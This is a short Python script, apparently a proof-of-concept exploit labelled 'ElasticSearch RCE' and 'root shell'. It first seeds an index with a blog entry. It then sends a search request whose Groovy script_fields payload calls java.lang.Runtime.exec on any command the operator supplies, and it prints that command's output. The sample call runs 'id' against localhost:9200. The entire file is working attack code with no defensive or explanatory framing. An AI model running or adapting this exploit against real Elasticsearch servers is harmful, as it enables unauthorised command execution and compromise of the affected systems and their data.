import requests,json
import time
# ElasticSearch RCE
# root shell
def attack(host,cmd):
	pre = requests.post("http://"+host+"/website/blog",json={"name":"test"})
	time.sleep(0.7)
	#print(pre.text)
	data = r'{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"'+cmd+r'\").getText()"}}}'
	r = requests.post("http://"+host+"/_search?pretty",data=data)
	j = json.loads(r.text)
	#print(j)
	# [:-1]去掉\n
	ret = j.get("hits").get("hits")[0].get("fields").get("lupin")[0][:-1]
	return ret


if __name__ == '__main__':
	print(attack("localhost:9200","id"))